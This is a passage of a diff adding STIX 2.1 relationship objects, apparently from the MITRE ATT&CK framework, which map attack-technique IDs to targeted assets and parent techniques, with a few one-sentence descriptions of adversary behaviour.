+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77566f94-5e26-41c9-892f-2f62b395afe7", + "created": "2023-09-28T20:01:43.057Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:01:43.057Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77665fea-cef1-4dd3-8be0-149b0c3d86f9", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7770655e-9550-48c6-98ea-f8f31a7f883e", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--778706c8-fcd0-45c2-be56-ab6903977ce2", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--778a90a4-fc12-45a3-9558-dd249098b720", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--778f2b21-cb58-4767-b4a9-690dfef1c2c9", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7790290b-8000-4523-96f7-b734298bc51e", + "created": "2024-06-26T14:49:59.826Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:49:59.826Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7799861e-ea03-4574-9170-e4b3ba241cc5", + "created": "2020-02-21T21:11:07.166Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", + "target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77ba347a-e758-4021-b886-16dd7c9cf815", + "created": "2024-06-27T09:42:39.313Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:42:39.313Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77c5b482-aba1-44e6-af0a-8dfe39d886e2", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77cae8d4-6ffe-4457-b8d3-417f6b7459b9", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77ec3470-a571-43d1-8e54-e06e697fc429", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77f3a64d-227d-487f-8484-89007e05b59f", + "created": "2023-09-28T21:16:14.153Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:16:14.153Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77f3fde0-0bd2-40ee-85c6-1a0aec10117d", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7813da8b-173f-4b5d-8a82-6196717f528a", + "created": "2024-06-27T09:01:52.527Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:01:52.527Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7827ba7f-dd85-4135-abf1-925a9872d1d5", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--783133eb-b0a4-4d83-bf55-bcc46d230df3", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--784bde2d-2b2f-4c1c-bce4-752ffd7f93c1", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78549cce-18ef-4a43-b5f3-11c4f982b2dc", + "created": "2024-06-26T15:18:47.886Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:18:47.886Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--786778a1-d043-49ad-bd73-1834b21f4ac1", + "created": "2020-01-24T14:13:46.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--786a48a5-0d81-41a8-9c9a-abf08cd43ef1", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--787dcfb6-d37f-4570-ab2d-113551aa7188", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--787f56ea-b981-4893-8bdc-957c54958d70", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7881e32b-d5a6-40f6-b9b1-f70036d9c75d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78881a3d-59ad-4fbb-8bd2-69388a068584", + "created": "2023-09-29T18:01:45.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:01:45.518Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--788a2994-f3fd-4ac4-9ef3-06a72a4e1631", + "created": "2023-09-28T21:09:33.225Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:09:33.225Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--789879bd-1574-4b2a-a7b3-f36381c02203", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78a35f1d-91d2-4967-ad2e-27f3037781a4", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78aef07b-5bb6-4072-a9ea-2c2cdc95b43b", + "created": "2024-05-23T04:14:39.800Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:42:32.748Z", + "description": "Asset Mapping Rationale: Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel.", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78bde505-a353-4cae-a978-f87de382f3fd", + "created": "2020-10-01T00:44:24.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78be1fd9-41ae-4606-9230-085d852a191f", + "created": "2024-05-22T15:15:28.471Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:15:28.471Z", + "description": "Asset Mapping Rationale: Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Password reuse may allow the abuse of local accounts across a set of machines on a network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78d141c0-63d2-41a4-b5d5-2a669e7f92fb", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78e21821-7ba7-47fc-ba0b-a1f6116921c2", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--78eecb81-4803-48d1-abc0-7667594ea251", + "created": "2020-01-28T17:11:54.416Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7915f021-f9e6-4445-a466-d655009a3d51", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79235599-e23f-43cb-9c56-1eb22b7c4664", + "created": "2023-09-29T16:38:38.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:38:38.201Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--792cdb75-097c-48d5-9b50-2dd15568d3c4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79370ba5-9420-4c5f-9ddf-41532908e3e5", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": 